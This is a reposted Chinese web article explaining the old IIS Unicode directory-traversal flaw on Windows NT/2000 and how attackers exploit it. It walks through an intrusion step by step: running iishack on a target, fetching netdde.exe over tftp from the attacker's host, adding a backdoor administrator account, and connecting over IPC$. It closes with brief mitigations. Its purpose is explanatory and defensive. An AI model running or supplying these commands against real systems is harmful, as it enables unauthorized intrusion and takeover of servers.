设为首页
加入收藏
繁體中文
首 页客家风情客家影音山歌在线客家商城聊天室留言墙测字算命下载中心IT 技术客家论坛
您当前的位置:客家网 | 天南地北客家人 -> IT 技术-> 网络安全 -> 正文 退出登录 用户管理
栏目导航
· ASP · JSP
· 网络安全 · NET专区
· XML专区 · PHP专区
热门文章
· ASP+JavaScript的完整的..
· [图文] 防范非法用户的侵..
· ASP从数据库中获取文件..
· 网络管理中的常用命令
· [图文] 千年虫二世诞生业..
· [图文] FSO组件操作实例..
· 网络常见木马的手工清除..
· 利用ASP远程获取内容
· [图文] 简单购物车教程
· 一个ASP(VBScript)简..
· asp常用数据库连接方法..
· 网络常见木马的手工清除..
相关文章
· XCodeFactory 强化静态检..
· [组图] 架设流媒体服务器..
不要小看IIS的恶性杀手Unicode
作者:无从考证  来源:不详  发布时间:2006-4-1 6:44:53  发布人:Admin

减小字体 增大字体

IIS是“Internet Information Server”的缩写,微软公司的Web服务器,是Windows 2000以上级别操作系统自带的一个组件,通过它来实现Web服务器的功能。

  Unicode漏洞是一个专门攻击IIS的漏洞,Unicode漏洞是最容易让入侵者得手的一个漏洞,可以不费吹灰之力改掉默认主页,重则删除硬盘上的数据,高手甚至可以轻松获取Administrator权限!

  由于Windows NT/2000操作系统的普及率比较高,所以很容易使它成为很多黑客攻击的目标。目前,Windows NT/2000最主要的Unicode漏洞一共有四种,分别针对不同语言的操作系统。分别为:%c1%1c、%c0%cf、%c1%pc、%c0%9v。例如第一个 %c1%1c 的问题。c1 1c,中文简体里面没有这个字,按照正常的情况,根据内码转换文件\winnt\system32\c_936.nls会编码成“?”。但对简体中文版IIS中 c1 1c解码成了(c1-c0)*40+1c=5c=“\”。此编码发生在IIS检测处理路径串中的“\”之后,所以可以突破IIS路径访问到上级目录。

  被攻击迹象

  黑客一般都采用IIS HACK攻击法进行攻击,但是需要工具“Iishack”(注:Iishack.exe是攻击NT 4.0的,Iishack1.exe是攻击NT 5.0的) Netcat和TFTP还有Netdde。

  一般入侵者的攻击手法是这样的:

  首先,将TFTP装到机器里面,将自己的机器变成一个FTP服务器。然后,搜索到NT机器的IP地址来进行攻击,例如:192.168.0.10。

  “c:\iishack 192.168.0.10 80 99 ”

  如果显示攻击成功的话,黑客就可以再输入:

  “c:\telnet 192.168.0.10 99 ”

  可以进入到“c:\winnt\system32\”里面,然后入侵者会运行“c:\winnt\system32\tftp -i <自己的IP地址> get netdde.exe ”然后再运行Netdde.exe文件,建立一个账号,将它的权限提升到Administrators组:

  “c:\winnt\system32\netdde.exe net user make love /add ”

  “c:\winnt\system32\netdde.exe net localgroup administrators make /add”

  然后退出来,用“net use \\192.168.0.10\ipc$ love /user:make”建立IPC连接以进行非法入侵。

  被攻击的机器,入侵者可以利用漏洞修改主页;删除硬盘上的东西;建立代理服务器,危害非常大。

  解决方法

   限制网络用户访问和调用“CMD”命令的权限;若没必要使用“Scripts”和“Msadc”目录,删除或改名;安装Windows NT系统时不要使用默认“WINNT”路径,改为其他的文件夹,如“C:\mywindowsnt”。

  


[] [返回上一页] [打 印] [收 藏]
∷相关文章评论∷    (评论内容只代表网友观点,与本站立场无关!) [更多评论…]
关于本站 - 网站合作 - 免责声明 - 友情连接 - 网站地图 - 客家论坛
本站部份内容来自网络 如无意中侵犯了您的权利 请及时与我们联系 我们会尽快处理
Copyright © 2006-2008 天南地北客家人
Email:yddlts@126.com  QQ:153161602
站长:大浪淘沙    QQ群:33754730
粤ICP备07019796号